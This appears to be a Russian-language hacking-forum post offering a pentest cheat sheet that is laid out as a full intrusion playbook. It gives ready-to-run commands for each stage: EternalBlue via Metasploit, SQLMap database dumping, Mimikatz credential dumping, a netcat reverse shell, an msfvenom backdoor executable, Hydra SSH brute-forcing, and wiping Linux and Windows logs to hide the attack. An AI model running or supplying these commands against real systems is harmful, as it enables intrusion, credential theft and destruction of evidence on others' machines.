• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Краткая шпаргалка по пентесту

admin

#root
Администратор
Регистрация
20.01.2011
Сообщения
7,665
Розыгрыши
0
Реакции
135
Включает этапы пентеста, инструменты и основные команды для каждого этапа.

1. Этапы пентеста

1.1.
Разведка (Reconnaissance/Information Gathering)
Сбор информации о целевой системе (активы, IP-адреса, домены, услуги).

Инструменты:
-
whois — сбор информации о домене.

Bash:
whois example.com

-
nslookup — запрос DNS-информации.

Bash:
nslookup example.com

-
theHarvester — сбор информации из публичных источников.

Bash:
theharvester -d example.com -l 500 -b google

-
shodan.io — поиск информации о сервисах и уязвимостях на IP-адресе.

1.2.
Сканирование (Scanning)
Анализ сетевой структуры, открытых портов, версий программного обеспечения.

Инструменты:
-
Nmap — сканирование портов и служб.

Bash:
nmap -sS -Pn -A -T4 192.168.1.1

-
-sS — SYN scan (сканирование с использованием неполных TCP-соединений),
-
-Pn — пропуск проверки доступности хоста (без ping),
-
-A — определение ОС, версий программ и выполнение скриптов.

-
Netcat (nc) — диагностика открытых портов и ручное взаимодействие с сервисами.

Bash:
nc -v 192.168.1.1 80


1.3.
Анализ уязвимостей (Vulnerability Analysis)
Идентификация уязвимостей в системах или приложениях.

Инструменты:
-
Nikto — сканирование веб-серверов на известные уязвимости.

Bash:
nikto -h http://example.com

  • OpenVAS — комплексное сканирование уязвимостей.
    [*]
    Nessus — поиск уязвимостей с помощью одного из наиболее популярных инструментов.
    [*]

Searchsploit — поиск эксплойтов в базе Exploit-DB.

Bash:
searchsploit apache 2.4


1.4.
Эксплуатация (Exploitation)
Использование уязвимостей для получения доступа к системе.

Инструменты:
-
Metasploit Framework — платформа для эксплуатации уязвимостей.

Bash:
msfconsole

Пример использования:
1. Выбрать эксплойт:

Bash:
use exploit/windows/smb/ms17_010_eternalblue

2. Установить цели:

Bash:
set RHOSTS 192.168.1.1

3. Запуск эксплойта:

Bash:
exploit


-
SQLMap — автоматизация SQL-инъекций.

Bash:
sqlmap -u "http://example.com/page?id=1" --dbs


1.5.
Постэксплуатация (Post-Exploitation)
После получения доступа важно изучить систему, получить дополнительные привилегии и найти полезную информацию.

Инструменты:
-
Privilege Escalation — повышение привилегий (Linux):

Bash:
sudo -l

или поиск конфигурационных ошибок:

Bash:
find / -perm -4000 2>/dev/null


-
Mimikatz — сбор данных аутентификации в Windows.

Bash:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit


1.6.
Укрепление позиций (Persistence)
Обеспечение постоянного доступа к скомпрометированной системе.

Инструменты:
-
Netcat — создание обратного шелла.

Bash:
nc -lvp 4444

На целевой системе:

Bash:
nc 192.168.1.2 4444 -e /bin/bash


-
Metasploit — создание бэкдора.

Bash:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > backdoor.exe


1.7.
Подчистка следов (Clearing Tracks)
После завершения атаки важно удалить логи и следы проникновения.

Команды:
-
Linux:

Bash:
rm -rf /var/log/*

-
Windows:

Bash:
wevtutil cl System
  wevtutil cl Security


2. Основные команды для пентеста

-
Netcat (nc) — создание прослушивания порта и работа с сетевыми соединениями.

Bash:
nc -lvp 4444  # прослушивание порта


-
Hydra — брутфорс паролей.

Bash:
hydra -l admin -P passwords.txt ssh://192.168.1.1


-
Burp Suite — перехват и модификация HTTP-запросов для анализа веб-приложений.
Используется для анализа трафика и поиска уязвимостей.
 
Activity
So far there's no one here